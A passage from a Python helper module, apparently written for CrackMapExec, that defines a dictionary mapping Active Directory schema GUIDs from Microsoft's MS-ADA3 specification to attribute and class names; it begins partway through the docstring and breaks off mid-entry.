[MS-ADA3] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada3/4517e835-3ee6-44d4-bb95-a94b6966bfb0\n GUIDS gathered from (lots of cleaning made from that source, things may be missing):\n - https://www.powershellgallery.com/packages/SDDLParser/0.5.0/Content/SDDLParserADObjects.ps1\n\n\nThis library is, for the moment, not present in the Impacket version used by CrackMapExec, so I add it manually in helpers.\n\"\"\"\n\nSCHEMA_OBJECTS = {\n \"2a132580-9373-11d1-aebc-0000f80367c1\": \"FRS-Partner-Auth-Level\",\n \"2a8c68fc-3a7a-4e87-8720-fe77c51cbe74\": \"ms-DS-Non-Members-BL\",\n \"963d2751-48be-11d1-a9c3-0000f80367c1\": \"Mscope-Id\",\n \"bf967a0c-0de6-11d0-a285-00aa003049e2\": \"Range-Lower\",\n \"29259694-09e4-4237-9f72-9306ebe63ab2\": \"ms-TS-Primary-Desktop\",\n \"963d2756-48be-11d1-a9c3-0000f80367c1\": \"DHCP-Class\",\n \"1562a632-44b9-4a7e-a2d3-e426c96a3acc\": \"ms-PKI-Private-Key-Recovery-Agent\",\n \"2a132581-9373-11d1-aebc-0000f80367c1\": \"FRS-Primary-Member\",\n \"4b1cba4e-302f-4134-ac7c-f01f6c797843\": \"ms-DS-Phonetic-First-Name\",\n \"7bfdcb7d-4807-11d1-a9c3-0000f80367c1\": \"Msi-File-List\",\n \"bf967a0d-0de6-11d0-a285-00aa003049e2\": \"Range-Upper\",\n \"f63aa29a-bb31-48e1-bfab-0a6c5a1d39c2\": \"ms-TS-Secondary-Desktops\",\n \"5245801a-ca6a-11d0-afff-0000f80367c1\": \"FRS-Replica-Set-GUID\",\n \"f217e4ec-0836-4b90-88af-2f5d4bbda2bc\": \"ms-DS-Phonetic-Last-Name\",\n \"d9e18313-8939-11d1-aebc-0000f80367c1\": \"Msi-Script\",\n \"bf967a0e-0de6-11d0-a285-00aa003049e2\": \"RDN\",\n \"9daadc18-40d1-4ed1-a2bf-6b9bf47d3daa\": \"ms-TS-Primary-Desktop-BL\",\n \"e0fa1e8a-9b45-11d0-afdd-00c04fd930c9\": \"Display-Specifier\",\n \"bf967aa8-0de6-11d0-a285-00aa003049e2\": \"Print-Queue\",\n \"bf967a8f-0de6-11d0-a285-00aa003049e2\": \"DMD\",\n \"26d9736b-6070-11d1-a9c6-0000f80367c1\": \"FRS-Replica-Set-Type\",\n \"6cd53daf-003e-49e7-a702-6fa896e7a6ef\": \"ms-DS-Phonetic-Department\",\n \"96a7dd62-9118-11d1-aebc-0000f80367c1\": \"Msi-Script-Name\",\n \"bf967a0f-0de6-11d0-a285-00aa003049e2\": \"RDN-Att-ID\",\n \"34b107af-a00a-455a-b139-dd1a1b12d8af\": \"ms-TS-Secondary-Desktop-BL\",\n \"1be8f174-a9ff-11d0-afe2-00c04fd930c9\": \"FRS-Root-Path\",\n \"5bd5208d-e5f4-46ae-a514-543bc9c47659\": \"ms-DS-Phonetic-Company-Name\",\n \"bf967937-0de6-11d0-a285-00aa003049e2\": \"Msi-Script-Path\",\n \"bf967a10-0de6-11d0-a285-00aa003049e2\": \"Registered-Address\",\n \"faaea977-9655-49d7-853d-f27bb7aaca0f\": \"MS-TS-Property01\",\n \"5fd4250c-1262-11d0-a060-00aa006c33ed\": \"Display-Template\",\n \"83cc7075-cca7-11d0-afff-0000f80367c1\": \"Query-Policy\",\n \"5a8b3261-c38d-11d1-bbc9-0080c76670c0\": \"SubSchema\",\n \"5245801f-ca6a-11d0-afff-0000f80367c1\": \"FRS-Root-Security\",\n \"e21a94e4-2d66-4ce5-b30d-0ef87a776ff0\": \"ms-DS-Phonetic-Display-Name\",\n \"96a7dd63-9118-11d1-aebc-0000f80367c1\": \"Msi-Script-Size\",\n \"bf967a12-0de6-11d0-a285-00aa003049e2\": \"Remote-Server-Name\",\n \"3586f6ac-51b7-4978-ab42-f936463198e7\": \"MS-TS-Property02\",\n \"bf967915-0de6-11d0-a285-00aa003049e2\": \"Account-Expires\",\n \"ddac0cee-af8f-11d0-afeb-00c04fd930c9\": \"FRS-Service-Command\",\n \"def449f1-fd3b-4045-98cf-d9658da788b5\": \"ms-DS-HAB-Seniority-Index\",\n \"9a0dc326-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Authenticate\",\n \"bf967a14-0de6-11d0-a285-00aa003049e2\": \"Remote-Source\",\n \"70004ef5-25c3-446a-97c8-996ae8566776\": \"MS-TS-ExpireDate\",\n \"bf967aa9-0de6-11d0-a285-00aa003049e2\": \"Remote-Mail-Recipient\",\n \"bf967a80-0de6-11d0-a285-00aa003049e2\": \"Attribute-Schema\",\n \"2a132582-9373-11d1-aebc-0000f80367c1\": \"FRS-Service-Command-Status\",\n \"c881b4e2-43c0-4ebe-b9bb-5250aa9b434c\": \"ms-DS-Promotion-Settings\",\n \"9a0dc323-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Base-Priority\",\n \"bf967a15-0de6-11d0-a285-00aa003049e2\": \"Remote-Source-Type\",\n \"54dfcf71-bc3f-4f0b-9d5a-4b2476bb8925\": \"MS-TS-ExpireDate2\",\n \"e0fa1e8b-9b45-11d0-afdd-00c04fd930c9\": \"Dns-Zone\",\n \"031952ec-3b72-11d2-90cc-00c04fd91ab1\": \"Account-Name-History\",\n \"1be8f175-a9ff-11d0-afe2-00c04fd930c9\": \"FRS-Staging-Path\",\n \"98a7f36d-3595-448a-9e6f-6b8965baed9c\": \"ms-DS-SiteName\",\n \"9a0dc32e-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Computer-Type\",\n \"2a39c5b0-8960-11d1-aebc-0000f80367c1\": \"Remote-Storage-GUID\",\n \"41bc7f04-be72-4930-bd10-1f3439412387\": \"MS-TS-ExpireDate3\",\n \"2a39c5bd-8960-11d1-aebc-0000f80367c1\": \"Remote-Storage-Service-Point\",\n \"7f56127d-5301-11d1-a9c5-0000f80367c1\": \"ACS-Aggregate-Token-Rate-Per-User\",\n \"2a132583-9373-11d1-aebc-0000f80367c1\": \"FRS-Time-Last-Command\",\n \"20119867-1d04-4ab7-9371-cfc3d5df0afd\": \"ms-DS-Supported-Encryption-Types\",\n \"18120de8-f4c4-4341-bd95-32eb5bcf7c80\": \"MSMQ-Computer-Type-Ex\",\n \"281416c0-1968-11d0-a28f-00aa003049e2\": \"Repl-Property-Meta-Data\",\n \"5e11dc43-204a-4faf-a008-6863621c6f5f\": \"MS-TS-ExpireDate4\",\n \"39bad96d-c2d6-4baf-88ab-7e4207600117\": \"document\",\n \"7f561283-5301-11d1-a9c5-0000f80367c1\": \"ACS-Allocable-RSVP-Bandwidth\",\n \"2a132584-9373-11d1-aebc-0000f80367c1\": \"FRS-Time-Last-Config-Change\",\n \"29cc866e-49d3-4969-942e-1dbc0925d183\": \"ms-DS-Trust-Forest-Trust-Info\",\n \"9a0dc33a-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Cost\",\n \"7bfdcb83-4807-11d1-a9c3-0000f80367c1\": \"Repl-Topology-Stay-Of-Execution\",\n \"0ae94a89-372f-4df2-ae8a-c64a2bc47278\": \"MS-TS-LicenseVersion\",\n \"a8df74d6-c5ea-11d1-bbcb-0080c76670c0\": \"Residential-Person\",\n \"1cb355a1-56d0-11d1-a9c6-0000f80367c1\": \"ACS-Cache-Timeout\",\n \"1be8f172-a9ff-11d0-afe2-00c04fd930c9\": \"FRS-Update-Timeout\",\n \"461744d7-f3b6-45ba-8753-fb9552a5df32\": \"ms-DS-Tombstone-Quota-Factor\",\n \"9a0dc334-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-CSP-Name\",\n \"bf967a16-0de6-11d0-a285-00aa003049e2\": \"Repl-UpToDate-Vector\",\n \"4b0df103-8d97-45d9-ad69-85c3080ba4e7\": \"MS-TS-LicenseVersion2\",\n \"7a2be07c-302f-4b96-bc90-0795d66885f8\": \"documentSeries\",\n \"7f56127a-5301-11d1-a9c5-0000f80367c1\": \"ACS-Direction\",\n \"2a132585-9373-11d1-aebc-0000f80367c1\": \"FRS-Version\",\n \"7b7cce4f-f1f5-4bb6-b7eb-23504af19e75\": \"ms-DS-Top-Quota-Usage\",\n \"2df90d83-009f-11d2-aa4c-00c04fd7d83a\": \"MSMQ-Dependent-Client-Service\",\n \"bf967a18-0de6-11d0-a285-00aa003049e2\": \"Replica-Source\",\n \"f8ba8f81-4cab-4973-a3c8-3a6da62a5e31\": \"MS-TS-LicenseVersion3\",\n \"19195a5a-6da0-11d0-afd3-00c04fd930c9\": \"Domain\",\n \"b93e3a78-cbae-485e-a07b-5ef4ae505686\": \"rFC822LocalPart\",\n \"1cb355a0-56d0-11d1-a9c6-0000f80367c1\": \"ACS-DSBM-DeadTime\",\n \"26d9736c-6070-11d1-a9c6-0000f80367c1\": \"FRS-Version-GUID\",\n \"d064fb68-1480-11d3-91c1-0000f87a57d4\": \"MS-DS-Machine-Account-Quota\",\n \"2df90d76-009f-11d2-aa4c-00c04fd7d83a\": \"MSMQ-Dependent-Client-Services\",\n \"bf967a1c-0de6-11d0-a285-00aa003049e2\": \"Reports\",\n \"70ca5d97-2304-490a-8a27-52678c8d2095\": \"MS-TS-LicenseVersion4\",\n \"19195a5b-6da0-11d0-afd3-00c04fd930c9\": \"Domain-DNS\",\n \"1cb3559e-56d0-11d1-a9c6-0000f80367c1\": \"ACS-DSBM-Priority\",\n \"1be8f173-a9ff-11d0-afe2-00c04fd930c9\": \"FRS-Working-Path\",\n \"638ec2e8-22e7-409c-85d2-11b21bee72de\": \"ms-DS-Object-Reference\",\n \"9a0dc33c-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Digests\",\n \"45ba9d1a-56fa-11d2-90d0-00c04fd91ab1\": \"Repl-Interval\",\n \"f3bcc547-85b0-432c-9ac0-304506bf2c83\": \"MS-TS-ManagingLS\",\n \"6617188d-8f3c-11d0-afda-00c04fd930c9\": \"RID-Manager\",\n \"1cb3559f-56d0-11d1-a9c6-0000f80367c1\": \"ACS-DSBM-Refresh\",\n \"66171887-8f3c-11d0-afda-00c04fd930c9\": \"FSMO-Role-Owner\",\n \"2b702515-c1f7-4b3b-b148-c0e4c6ceecb4\": \"ms-DS-Object-Reference-BL\",\n \"0f71d8e0-da3b-11d1-90a5-00c04fd91ab1\": \"MSMQ-Digests-Mig\",\n \"bf967a1d-0de6-11d0-a285-00aa003049e2\": \"Reps-From\",\n \"349f0757-51bd-4fc8-9d66-3eceea8a25be\": \"MS-TS-ManagingLS2\",\n \"bf967a99-0de6-11d0-a285-00aa003049e2\": \"Domain-Policy\",\n \"7f561287-5301-11d1-a9c5-0000f80367c1\": \"ACS-Enable-ACS-Service\",\n \"5fd424a1-1262-11d0-a060-00aa006c33ed\": \"Garbage-Coll-Period\",\n \"93f701be-fa4c-43b6-bc2f-4dbea718ffab\": \"ms-DS-Operations-For-Az-Role\",\n \"2df90d82-009f-11d2-aa4c-00c04fd7d83a\": \"MSMQ-Ds-Service\",\n \"bf967a1e-0de6-11d0-a285-00aa003049e2\": \"Reps-To\",\n \"fad5dcc1-2130-4c87-a118-75322cd67050\": \"MS-TS-ManagingLS3\",\n \"7bfdcb89-4807-11d1-a9c3-0000f80367c1\": \"RID-Set\",\n \"f072230e-aef5-11d1-bdcf-0000f80367c1\": \"ACS-Enable-RSVP-Accounting\",\n \"bf96797a-0de6-11d0-a285-00aa003049e2\": \"Generated-Connection\",\n \"f85b6228-3734-4525-b6b7-3f3bb220902c\": \"ms-DS-Operations-For-Az-Role-BL\",\n \"2df90d78-009f-11d2-aa4c-00c04fd7d83a\": \"MSMQ-Ds-Services\",\n \"7d6c0e93-7e20-11d0-afd6-00c04fd930c9\": \"Required-Categories\",\n \"f7a3b6a0-2107-4140-b306-75cb521731e5\": \"MS-TS-ManagingLS4\",\n \"8bfd2d3d-efda-4549-852c-f85e137aedc6\": \"domainRelatedObject\",\n \"7f561285-5301-11d1-a9c5-0000f80367c1\": \"ACS-Enable-RSVP-Message-Logging\",\n \"16775804-47f3-11d1-a9c3-0000f80367c1\": \"Generation-Qualifier\",\n \"1aacb436-2e9d-44a9-9298-ce4debeb6ebf\": \"ms-DS-Operations-For-Az-Task\",\n \"9a0dc331-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Encrypt-Key\",\n \"7bfdcb7f-4807-11d1-a9c3-0000f80367c1\": \"Retired-Repl-DSA-Signatures\",\n \"87e53590-971d-4a52-955b-4794d15a84ae\": \"MS-TSLS-Property01\",\n \"7860e5d2-c8b0-4cbb-bd45-d9455beb9206\": \"room\",\n \"eded5844-b3c3-41c3-a9e6-8984b52b7f98\": \"ms-Org-Group-Subtype-Name\",\n \"7f561286-5301-11d1-a9c5-0000f80367c1\": \"ACS-Event-Log-Level\",\n \"f0f8ff8e-1191-11d0-a060-00aa006c33ed\": \"Given-Name\",\n \"a637d211-5739-4ed1-89b2-88974548bc59\": \"ms-DS-Operations-For-Az-Task-BL\",\n \"9a0dc32f-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Foreign\",\n \"b7c69e6d-2cc7-11d2-854e-00a0c983f608\": \"Token-Groups\",\n \"47c77bb0-316e-4e2f-97f1-0d4c48fca9dd\": \"MS-TSLS-Property02\",\n \"09b10f14-6f93-11d2-9905-0000f87a57d4\": \"DS-UI-Settings\",\n \"49b7560b-4707-4aa0-a27c-e17a09ca3f97\": \"ms-Org-Is-Organizational-Group\",\n \"dab029b6-ddf7-11d1-90a5-00c04fd91ab1\": \"ACS-Identity-Name\",\n \"f754c748-06f4-11d2-aa53-00c04fd7d83a\": \"Global-Address-List\",\n \"79d2f34c-9d7d-42bb-838f-866b3e4400e2\": \"ms-DS-Other-Settings\",\n \"9a0dc32c-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-In-Routing-Servers\",\n \"46a9b11d-60ae-405a-b7e8-ff8a58d456d2\": \"Token-Groups-Global-And-Universal\",\n \"6a84ede5-741e-43fd-9dd6-aa0f61578621\": \"ms-DFSR-DisablePacketPrivacy\",\n \"80212842-4bdc-11d1-a9c4-0000f80367c1\": \"Rpc-Container\",\n \"8f905f24-a413-435a-8ed1-35385ec179f7\": \"ms-Org-Other-Display-Names\",\n \"f072230c-aef5-11d1-bdcf-0000f80367c1\": \"ACS-Max-Aggregate-Peak-Rate-Per-User\",\n \"bf96797d-0de6-11d0-a285-00aa003049e2\": \"Governs-ID\",\n \"564e9325-d057-c143-9e3b-4f9e5ef46f93\": \"ms-DS-Principal-Name\",\n \"8ea825aa-3b7b-11d2-90cc-00c04fd91ab1\": \"MSMQ-Interval1\",\n \"040fc392-33df-11d2-98b2-0000f87a57d4\": \"Token-Groups-No-GC-Acceptable\",\n \"87811bd5-cd8b-45cb-9f5d-980f3a9e0c97\": \"ms-DFSR-DefaultCompressionExclusionFilter\",\n \"3fdfee52-47f4-11d1-a9c3-0000f80367c1\": \"DSA\",\n \"ee5b6790-3358-41a8-93f2-134ce21f3813\": \"ms-Org-Leaders\",\n \"7f56127e-5301-11d1-a9c5-0000f80367c1\": \"ACS-Max-Duration-Per-Flow\",\n \"f30e3bbe-9ff0-11d1-b603-0000f80367c1\": \"GP-Link\",\n \"fbb9a00d-3a8c-4233-9cf9-7189264903a1\": \"ms-DS-Quota-Amount\",\n \"99b88f52-3b7b-11d2-90cc-00c04fd91ab1\": \"MSMQ-Interval2\",\n \"bf967a21-0de6-11d0-a285-00aa003049e2\": \"Revision\",\n \"a68359dc-a581-4ee6-9015-5382c60f0fb4\": \"ms-DFSR-OnDemandExclusionFileFilter\",\n \"bf967aac-0de6-11d0-a285-00aa003049e2\": \"rpc-Entry\",\n \"afa58eed-a698-417e-9f56-fad54252c5f4\": \"ms-Org-Leaders-BL\",\n \"f0722310-aef5-11d1-bdcf-0000f80367c1\": \"ACS-Max-No-Of-Account-Files\",\n \"f30e3bbf-9ff0-11d1-b603-0000f80367c1\": \"GP-Options\",\n \"6655b152-101c-48b4-b347-e1fcebc60157\": \"ms-DS-Quota-Effective\",\n \"9a0dc321-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Journal\",\n \"bf967a22-0de6-11d0-a285-00aa003049e2\": \"Rid\",\n \"7d523aff-9012-49b2-9925-f922a0018656\": \"ms-DFSR-OnDemandExclusionDirectoryFilter\",\n \"66d51249-3355-4c1f-b24e-81f252aca23b\": \"Dynamic-Object\",\n \"1cb3559c-56d0-11d1-a9c6-0000f80367c1\": \"ACS-Max-No-Of-Log-Files\",\n \"f30e3bc1-9ff0-11d1-b603-0000f80367c1\": \"GPC-File-Sys-Path\",\n \"16378906-4ea5-49be-a8d1-bfd41dff4f65\": \"ms-DS-Quota-Trustee\",\n \"9a0dc324-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Journal-Quota\",\n \"66171889-8f3c-11d0-afda-00c04fd930c9\": \"RID-Allocation-Pool\",\n \"11e24318-4ca6-4f49-9afe-e5eb1afa3473\": \"ms-DFSR-Options2\",\n \"88611bdf-8cf4-11d0-afda-00c04fd930c9\": \"rpc-Group\",\n \"7f561284-5301-11d1-a9c5-0000f80367c1\": \"ACS-Max-Peak-Bandwidth\",\n \"f30e3bc0-9ff0-11d1-b603-0000f80367c1\": \"GPC-Functionality-Version\",\n \"b5a84308-615d-4bb7-b05f-2f1746aa439f\": \"ms-DS-Quota-Used\",\n \"9a0dc325-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Label\",\n \"66171888-8f3c-11d0-afda-00c04fd930c9\": \"RID-Available-Pool\",\n \"936eac41-d257-4bb9-bd55-f310a3cf09ad\": \"ms-DFSR-CommonStagingPath\",\n \"dd712229-10e4-11d0-a05f-00aa006c33ed\": \"File-Link-Tracking\",\n \"7f56127c-5301-11d1-a9c5-0000f80367c1\": \"ACS-Max-Peak-Bandwidth-Per-Flow\",\n \"32ff8ecc-783f-11d2-9916-0000f87a57d4\": \"GPC-Machine-Extension-Names\",\n \"8a167ce4-f9e8-47eb-8d78-f7fe80abb2cc\": \"ms-DS-NC-Repl-Cursors\",\n \"4580ad25-d407-48d2-ad24-43e6e56793d7\": \"MSMQ-Label-Ex\",\n \"66171886-8f3c-11d0-afda-00c04fd930c9\": \"RID-Manager-Reference\",\n \"135eb00e-4846-458b-8ea2-a37559afd405\": \"ms-DFSR-CommonStagingSizeInMb\",\n \"88611be1-8cf4-11d0-afda-00c04fd930c9\": \"rpc-Profile\",\n \"f0722311-aef5-11d1-bdcf-0000f80367c1\": \"ACS-Max-Size-Of-RSVP-Account-File\",\n \"42a75fc6-783f-11d2-9916-0000f87a57d4\": \"GPC-User-Extension-Names\",\n \"9edba85a-3e9e-431b-9b1a-a5b6e9eda796\": \"ms-DS-NC-Repl-Inbound-Neighbors\",\n \"9a0dc335-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Long-Lived\",\n \"6617188c-8f3c-11d0-afda-00c04fd930c9\": \"RID-Next-RID\",\n \"d64b9c23-e1fa-467b-b317-6964d744d633\": \"ms-DFSR-StagingCleanupTriggerInPercent\",\n \"8e4eb2ed-4712-11d0-a1a0-00c04fd930c9\": \"File-Link-Tracking-Entry\",\n \"1cb3559d-56d0-11d1-a9c6-0000f80367c1\": \"ACS-Max-Size-Of-RSVP-Log-File\",\n \"7bd4c7a6-1add-4436-8c04-3999a880154c\": \"GPC-WQL-Filter\",\n \"855f2ef5-a1c5-4cc4-ba6d-32522848b61f\": \"ms-DS-NC-Repl-Outbound-Neighbors\",\n \"9a0dc33f-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Migrated\",\n \"6617188a-8f3c-11d0-afda-00c04fd930c9\": \"RID-Previous-Allocation-Pool\",\n \"b786cec9-61fd-4523-b2c1-5ceb3860bb32\": \"ms-DFS-Comment-v2\",\n \"f29653cf-7ad0-11d0-afd6-00c04fd930c9\": \"rpc-Profile-Element\",\n \"81f6e0df-3b90-11d2-90cc-00c04fd91ab1\": \"ACS-Max-Token-Bucket-Per-Flow\",\n \"bf96797e-0de6-11d0-a285-00aa003049e2\": \"Group-Attributes\",\n \"97de9615-b537-46bc-ac0f-10720f3909f3\": \"ms-DS-NC-Replica-Locations\",\n \"1d2f4412-f10d-4337-9b48-6e5b125cd265\": \"MSMQ-Multicast-Address\",\n \"7bfdcb7b-4807-11d1-a9c3-0000f80367c1\": \"RID-Set-References\",\n \"35b8b3d9-c58f-43d6-930e-5040f2f1a781\": \"ms-DFS-Generation-GUID-v2\",\n \"89e31c12-8530-11d0-afda-00c04fd930c9\": \"Foreign-Security-Principal\",\n \"7f56127b-5301-11d1-a9c5-0000f80367c1\": \"ACS-Max-Token-Rate-Per-Flow\",\n \"bf967980-0de6-11d0-a285-00aa003049e2\": \"Group-Membership-SAM\",\n \"3df793df-9858-4417-a701-735a1ecebf74\": \"ms-DS-NC-RO-Replica-Locations\",\n \"9a0dc333-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Name-Style\",\n \"6617188b-8f3c-11d0-afda-00c04fd930c9\": \"RID-Used-Pool\",\n \"3c095e8a-314e-465b-83f5-ab8277bcf29b\": \"ms-DFS-Last-Modified-v2\",\n \"88611be0-8cf4-11d0-afda-00c04fd930c9\": \"rpc-Server\",\n \"87a2d8f9-3b90-11d2-90cc-00c04fd91ab1\": \"ACS-Maximum-SDU-Size\",\n \"eea65905-8ac6-11d0-afda-00c04fd930c9\": \"Group-Priority\",\n \"f547511c-5b2a-44cc-8358-992a88258164\": \"ms-DS-NC-RO-Replica-Locations-BL\",\n \"eb38a158-d57f-11d1-90a2-00c04fd91ab1\": \"MSMQ-Nt4-Flags\",\n \"8297931c-86d3-11d0-afda-00c04fd930c9\": \"Rights-Guid\",\n \"edb027f3-5726-4dee-8d4e-dbf07e1ad1f1\": \"ms-DFS-Link-Identity-GUID-v2\",\n \"c498f152-dc6b-474a-9f52-7cdba3d7d351\": \"friendlyCountry\",\n \"9c65329b-3b90-11d2-90cc-00c04fd91ab1\": \"ACS-Minimum-Delay-Variation\",\n \"9a9a021e-4a5b-11d1-a9c3-0000f80367c1\": \"Group-Type\",\n \"2de144fc-1f52-486f-bdf4-16fcc3084e54\": \"ms-DS-Non-Security-Group-Extra-Classes\",\n \"6f914be6-d57e-11d1-90a2-00c04fd91ab1\": \"MSMQ-Nt4-Stub\",\n \"a8df7465-c5ea-11d1-bbcb-0080c76670c0\": \"Role-Occupant\",\n \"86b021f6-10ab-40a2-a252-1dc0cc3be6a9\": \"ms-DFS-Link-Path-v2\",\n \"f29653d0-7ad0-11d0-afd6-00c04fd930c9\": \"rpc-Server-Element\",\n \"9517fefb-3b90-11d2-90cc-00c04fd91ab1\": \"ACS-Minimum-Latency\",\n \"eea65904-8ac6-11d0-afda-00c04fd930c9\": \"Groups-to-Ignore\",\n \"d161adf0-ca24-4993-a3aa-8b2c981302e8\": \"MS-DS-Per-User-Trust-Quota\",\n \"9a0dc330-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-OS-Type\",\n \"81d7f8c2-e327-4a0d-91c6-b42d4009115f\": \"roomNumber\",\n \"57cf87f7-3426-4841-b322-02b3b6e9eba8\": \"ms-DFS-Link-Security-Descriptor-v2\",\n \"8447f9f3-1027-11d0-a05f-00aa006c33ed\": \"FT-Dfs\",\n \"8d0e7195-3b90-11d2-90cc-00c04fd91ab1\": \"ACS-Minimum-Policed-Size\",\n \"bf967982-0de6-11d0-a285-00aa003049e2\": \"Has-Master-NCs\",\n \"8b70a6c6-50f9-4fa3-a71e-1ce03040449b\": \"MS-DS-Per-User-Trust-Tombstones-Quota\",\n \"9a0dc32b-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Out-Routing-Servers\",\n \"7bfdcb80-4807-11d1-a9c3-0000f80367c1\": \"Root-Trust\",\n \"200432ce-ec5f-4931-a525-d7f4afe34e68\": \"ms-DFS-Namespace-Identity-GUID-v2\",\n \"2a39c5be-8960-11d1-aebc-0000f80367c1\": \"RRAS-Administration-Connection-Point\",\n \"aec2cfe3-3b90-11d2-90cc-00c04fd91ab1\": \"ACS-Non-Reserved-Max-SDU-Size\",\n \"bf967981-0de6-11d0-a285-00aa003049e2\": \"Has-Partial-Replica-NCs\",\n \"d921b50a-0ab2-42cd-87f6-09cf83a91854\": \"ms-DS-Preferred-GC-Site\",\n \"9a0dc328-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Owner-ID\",\n \"88611bde-8cf4-11d0-afda-00c04fd930c9\": \"rpc-Ns-Annotation\",\n \"0c3e5bc5-eb0e-40f5-9b53-334e958dffdb\": \"ms-DFS-Properties-v2\",\n \"bf967a9c-0de6-11d0-a285-00aa003049e2\": \"Group\",\n \"b6873917-3b90-11d2-90cc-00c04fd91ab1\": \"ACS-Non-Reserved-Min-Policed-Size\",\n \"5fd424a7-1262-11d0-a060-00aa006c33ed\": \"Help-Data16\",\n \"d7c53242-724e-4c39-9d4c-2df8c9d66c7a\": \"ms-DS-Repl-Attribute-Meta-Data\",\n \"2df90d75-009f-11d2-aa4c-00c04fd7d83a\": \"MSMQ-Prev-Site-Gates\",\n \"bf967a23-0de6-11d0-a285-00aa003049e2\": \"rpc-Ns-Bindings\",\n \"ec6d7855-704a-4f61-9aa6-c49a7c1d54c7\": \"ms-DFS-Schema-Major-Version\",\n \"f39b98ae-938d-11d1-aebd-0000f80367c1\": \"RRAS-Administration-Dictionary\",\n \"a331a73f-3b90-11d2-90cc-00c04fd91ab1\": \"ACS-Non-Reserved-Peak-Rate\",\n \"5fd424a8-1262-11d0-a060-00aa006c33ed\": \"Help-Data32\",\n \"2f5c8145-e1bd-410b-8957-8bfa81d5acfd\": \"ms-DS-Repl-Value-Meta-Data\",\n \"9a0dc327-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Privacy-Level\",\n \"7a0ba0e0-8e98-11d0-afda-00c04fd930c9\": \"rpc-Ns-Codeset\",\n \"fef9a725-e8f1-43ab-bd86-6a0115ce9e38\": \"ms-DFS-Schema-Minor-Version\",\n \"bf967a9d-0de6-11d0-a285-00aa003049e2\": \"Group-Of-Names\",\n \"a916d7c9-3b90-11d2-90cc-00c04fd91ab1\": \"ACS-Non-Reserved-Token-Size\",\n \"5fd424a9-1262-11d0-a060-00aa006c33ed\": \"Help-File-Name\",\n \"0ea12b84-08b3-11d3-91bc-0000f87a57d4\": \"MS-DS-Replicates-NC-Reason\",\n \"9a0dc33e-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-QM-ID\",\n \"80212841-4bdc-11d1-a9c4-0000f80367c1\": \"rpc-Ns-Entry-Flags\",\n \"2d7826f0-4cf7-42e9-a039-1110e0d9ca99\": \"ms-DFS-Short-Name-Link-Path-v2\",\n \"bf967a91-0de6-11d0-a285-00aa003049e2\": \"Sam-Domain-Base\",\n \"1cb355a2-56d0-11d1-a9c6-0000f80367c1\": \"ACS-Non-Reserved-Tx-Limit\",\n \"ec05b750-a977-4efe-8e8d-ba6c1a6e33a8\": \"Hide-From-AB\",\n \"85abd4f4-0a89-4e49-bdec-6f35bb2562ba\": \"ms-DS-Replication-Notify-First-DSA-Delay\",\n \"8e441266-d57f-11d1-90a2-00c04fd91ab1\": \"MSMQ-Queue-Journal-Quota\",\n \"bf967a24-0de6-11d0-a285-00aa003049e2\": \"rpc-Ns-Group\",\n \"6ab126c6-fa41-4b36-809e-7ca91610d48f\": \"ms-DFS-Target-List-v2\",\n \"0310a911-93a3-4e21-a7a3-55d85ab2c48b\": \"groupOfUniqueNames\",\n \"fe7afe45-3d14-43a7-afa7-3a1b144642af\": \"ms-Mcs-AdmPwdExpirationTime\",\n \"f072230d-aef5-11d1-bdcf-0000f80367c1\": \"ACS-Non-Reserved-Tx-Size\",\n \"bf967985-0de6-11d0-a285-00aa003049e2\": \"Home-Directory\",\n \"d63db385-dd92-4b52-b1d8-0d3ecc0e86b6\": \"ms-DS-Replication-Notify-Subsequent-DSA-Delay\",\n \"2df90d87-009f-11d2-aa4c-00c04fd7d83a\": \"MSMQ-Queue-Name-Ext\",\n \"bf967a25-0de6-11d0-a285-00aa003049e2\": \"rpc-Ns-Interface-ID\",\n \"ea944d31-864a-4349-ada5-062e2c614f5e\": \"ms-DFS-Ttl-v2\",\n \"bf967aad-0de6-11d0-a285-00aa003049e2\": \"Sam-Server\",\n \"4c9928d7-d725-4fa6-a109-aba3ad8790e5\": \"ms-Mcs-AdmPwd\",\n \"7f561282-5301-11d1-a9c5-0000f80367c1\": \"ACS-Permission-Bits\",\n \"bf967986-0de6-11d0-a285-00aa003049e2\": \"Home-Drive\",\n \"08e3aa79-eb1c-45b5-af7b-8f94246c8e41\": \"ms-DS-ReplicationEpoch\",\n \"3f6b8e12-d57f-11d1-90a2-00c04fd91ab1\": \"MSMQ-Queue-Quota\",\n \"29401c48-7a27-11d0-afd6-00c04fd930c9\": \"rpc-Ns-Object-ID\",\n \"3ced1465-7b71-2541-8780-1e1ea6243a82\": \"ms-DS-BridgeHead-Servers-Used\",\n \"f30e3bc2-9ff0-11d1-b603-0000f80367c1\": \"Group-Policy-Container\",\n \"1cb3559a-56d0-11d1-a9c6-0000f80367c1\": \"ACS-Policy-Name\",\n \"a45398b7-c44a-4eb6-82d3-13c10946dbfe\": \"houseIdentifier\",\n \"d5b35506-19d6-4d26-9afb-11357ac99b5e\": \"ms-DS-Retired-Repl-NC-Signatures\",\n \"9a0dc320-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Queue-Type\",\n \"bf967a27-0de6-11d0-a285-00aa003049e2\": \"rpc-Ns-Priority\",\n \"51c9f89d-4730-468d-a2b5-1d493212d17e\": \"ms-DS-Is-Used-As-Resource-Security-Attribute\",\n \"bf967aae-0de6-11d0-a285-00aa003049e2\": \"Secret\",\n \"7f561281-5301-11d1-a9c5-0000f80367c1\": \"ACS-Priority\",\n \"6043df71-fa48-46cf-ab7c-cbd54644b22d\": 